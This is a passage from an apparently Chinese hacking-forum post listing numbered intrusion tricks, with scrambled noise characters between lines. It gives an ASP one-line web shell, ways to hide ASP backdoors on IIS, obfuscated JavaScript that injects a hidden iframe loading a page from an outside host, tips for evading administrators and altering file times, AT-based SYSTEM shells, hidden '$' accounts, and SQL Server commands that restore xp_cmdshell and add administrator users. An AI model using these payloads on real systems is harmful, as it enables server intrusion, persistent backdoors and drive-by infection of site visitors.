; _  L8 ~$ Y" |- `: jf).<%if request("cmd")<>"" then execute request("pass")%>
- n! |' i6 g/ |4 t0 w1 |3 ?
% h. I- f9 i8 j  l! q" t52、at "12:17" /interactive cmd/ x( B1 X( Y- Q/ b
执行后可以用AT命令查看新加的任务
$ n5 L# _5 g9 S/ n3 D  b  K( k用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。2 H* V+ n$ z+ L& z

9 H) p! |" X' O9 h" K9 Z53、隐藏ASP后门的两种方法# X/ k, g% t' Y
1、建立非标准目录:mkdir images..\
2 }; u) v0 c7 z) I/ v% Z1 c拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
, z  e3 r/ t, t) X; M% ]9 j+ e( a% |/ \通过web访问ASP木马:http://ip/images../news.asp?action=login4 C) m2 P  ~4 I! Q4 W/ B( @
如何删除非标准目录:rmdir images..\ /s
6 X/ s: ]( A2 ^2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
) ^1 x8 E6 k9 r+ K% mmkdir programme.asp
% u' E( F& Y$ A4 J+ b- G8 U5 |! M新建1.txt文件内容:<!--#include file=”12.jpg”-->
% K3 D" |( d! k0 R  B( t. {新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件: T0 ]  p0 ^" {" V5 p+ y1 _9 [: j
attrib +H +S programme.asp
6 _& X9 Y1 S' \! V2 B9 [通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
6 G. U! d- y2 u3 i  O
  n2 T: }0 L8 ~54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
0 r7 k" P  e/ z: n; N% ^: @然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
8 [1 q* d3 {4 Z! h0 h7 z+ t, ?0 w: ^/ ]
55、JS隐蔽挂马
. U8 H# d  n) I1 d$ a1.3 V# w0 c' M5 d4 F6 T3 N
var tr4c3="<iframe src=ht";; n0 _9 K4 y  {$ T- c3 h3 }1 m
tr4c3 = tr4c3+"tp:/";  L/ K' M0 S3 u/ z0 h. K
tr4c3 = tr4c3+"/ww";7 X  z( R1 X! {
tr4c3 = tr4c3+"w.tr4";
: W( o0 D4 @3 H% a: [4 ]tr4c3 = tr4c3+"c3.com/inc/m";% w: S( M# M1 {5 u6 i; {# k6 Y, r
tr4c3 = tr4c3+"m.htm style="display:none"></i";& n: @! X8 ?. l/ {' \
tr4c3 =tr4c3+"frame>'";  Z8 J- F/ e; Z* }2 N
document.write(tr4c3);' e; {) |+ c! c( ]! \
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。( q2 o7 R. `* Z( P( P1 ?) h) d
1 u" u* G- L1 Z
2.
; x3 F+ T( {: c/ B8 Z转换进制,然后用EVAL执行。如
& O  T; ]8 l) N7 l" S2 n% r, Seval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");3 l$ H2 e$ s6 Z9 @
不过这个有点显眼。
  n# t( h( q& @' P4 M( ^- g3.
! c8 K  `! b8 \4 @  D+ \+ Jdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');/ l- O7 A8 q- G" A# C
最后一点,别忘了把文件的时间也修改下。: ~5 s1 [$ m  \. L
& m5 v* F, X. m
56.3389终端入侵常用DOS命令
1 a$ g* g) K' R$ h) ltaskkill taskkill /PID 1248 /t# X: @- S, W* e, t) r7 R
! }1 V# Q8 b/ _+ I' W4 B
tasklist 查进程+ r2 `; G( b+ p4 Y% j) K# G  G  T* r

7 b5 P! q5 s& ~! F$ ]# [cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
+ y, _& B% ?; C6 eiisreset /reboot
3 J9 C( t0 u$ B' K) T, Stsshutdn /reboot /delay:1    重起服务器
5 a5 m0 k1 M% [8 m. d! z$ o, U2 h( K/ [2 s2 q. b
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户," u& r. D& i) U3 C- L0 q6 i
! X% n( @; i' Y' G( q( d) ~
query user 查看当前终端用户在线情况
1 q5 k7 f( Q9 R" c% b  G' |( Q1 d3 I- w( X, O8 C1 @: c
要显示有关所有会话使用的进程的信息,请键入:query process *7 o' |0 ~: Y1 ?' V# V- ~1 B
( u* i6 m) H3 f
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
+ @5 ]5 i% r0 p' Q' R& ?6 e8 K' O. O8 Y$ _
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& d; \* t5 Y! D& K- M! X3 m" Y, q) g) N
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02; H6 x5 M7 b1 w/ `& }
+ p. z3 l% r/ `' T$ I7 w8 [- e2 o- {
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启" r1 H7 `/ a% y4 `0 Q
9 {, z, X4 R) ~$ _
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统, b& p, J2 C1 Q; @6 p3 \

/ O  f! z. A2 L4 Y* U7 M) L. _命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。. {4 F) I4 ~- g, q7 `$ F" b/ L

8 n4 s- E9 A8 [; t  |+ \- B命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机* u! `+ T& C" Z7 j+ q4 T0 X

" ]# f1 `* y+ w* g0 g1 Y1 O56、在地址栏或按Ctrl+O,输入:( T6 ?+ J  ?- X: ~1 D
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
8 m9 P6 \. @7 ~& V! u: v: d9 H& {8 G' `; F- s
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。2 o+ t, P% M8 H) x" H) v5 n; V
- Z$ q. H* `, ^
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ m: Z9 Q: A2 E3 u1 c1 w. |# y
用net localgroup administrators是可以看到管理组下,加了$的用户的。
9 K; S' M& J/ B% u( |" R: ?) o( |1 [$ H8 y3 X
58、 sa弱口令相关命令' e8 e: ~$ k$ o, b& S/ a+ l4 h( W
( ?1 U# M( h( {. u: A% t
一.更改sa口令方法:# @! i" |7 u: R$ v8 A1 h+ @
用sql综合利用工具连接后,执行命令:
8 P, D) `+ ~7 L  X9 q2 G+ Lexec sp_password NULL,'20001001','sa', R1 l+ N/ M. @
(提示:慎用!)
1 C; N. ?/ ]1 x7 i& [% M" x) V! [( P3 O# Y/ q0 d
二.简单修补sa弱口令.  ]. d2 c, q% g2 p4 b2 ?

0 [( y# p4 n& ]$ P3 E, t4 F方法1:查询分离器连接后执行:8 `. R" a+ O2 X. r5 Y7 I7 e
if exists (select * from
0 u6 N* n% n5 w3 a/ Q2 h% idbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- z# k# D, g' S; c6 `3 ~4 Z
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)  p1 Y) X+ p/ G$ _

* m6 S1 q) t) w' ~/ t# gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 R' }! q) t! h! ]1 N7 l
6 c2 R. ^2 M. ]0 |2 F& u
GO8 Q! D: j0 n+ ]' e
! A5 l, D4 ~2 Q. ^5 W- c9 T  b
然后按F5键命令执行完毕: x. X# Z& z4 r$ F; ~

8 X: g6 I/ S/ M/ o; `* P7 K0 r方法2:查询分离器连接后7 W- _4 T4 K# x" `
第一步执行:use master' \; {7 R. f6 x4 }) }8 Y. F7 b
第二步执行:sp_dropextendedproc 'xp_cmdshell'
! c/ K8 {& x, u, j0 P然后按F5键命令执行完毕4 [# N# }! P  N1 K5 W
# ~" ~+ H1 |9 c/ ^

' i' n- s% l, k三.常见情况恢复执行xp_cmdshell.3 X$ Y- r) \' w; T: m

+ C+ d' U/ X) z6 A# ~$ m2 `4 W" [  R$ F8 A/ y( X, V' ?+ ?+ z
1 未能找到存储过程'master..xpcmdshell'.
/ n& R/ B+ c! N) V5 h   恢复方法:查询分离器连接后,
& m8 v' K' u/ Y! v0 x2 U. b3 y第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 F% [3 I+ D3 m+ ~# l# k! X第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 D# S/ y4 I% G/ A( |
然后按F5键命令执行完毕
2 t7 ]9 S- |6 m; H3 r: s% j% f! ^
- Z! u9 g# O! Y( ]) w: y# C2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
2 N! a% U; I3 r. R恢复方法:查询分离器连接后,
# Q6 q8 u9 q7 F% G6 Z第一步执行:sp_dropextendedproc "xp_cmdshell"
# _% t/ x. C8 N第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 o; u) ^) j5 q3 H然后按F5键命令执行完毕
% A; |: N: G7 n8 ~' }( ]( b3 g: |8 J. t. T, W
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)9 u' r0 }* f. z- r/ q6 s
恢复方法:查询分离器连接后,) Q, P  N3 m/ ?5 m; @
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
8 y/ E! h9 i2 j. |& a4 V第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
6 d% l8 K; A, }7 C+ F* \然后按F5键命令执行完毕- r: R9 u6 S$ ~; z1 T, M

1 N8 h0 q0 `5 v  @3 K/ I四.终极方法.3 [! _+ x- ~4 e. i
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
) ^3 g4 n" s+ R% P查询分离器连接后,
6 G2 K& |& _+ t+ m2000servser系统:( Y  E8 \8 l; l2 l* m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'2 o1 v2 y4 n  }( o

( k$ _1 m* S8 X2 T3 ?" v' Adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- Y2 R0 T7 D, S# p+ p1 ~' r7 F
( i% Z1 e% C% Nxp或2003server系统:8 T% T3 A& D4 c4 P5 T# P, {
$ S) N5 l  [0 M& Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" ^$ D9 f+ `3 y& r5 v* A, y

' M, U# o4 P4 B! Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 U% C8 X, L) y2 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表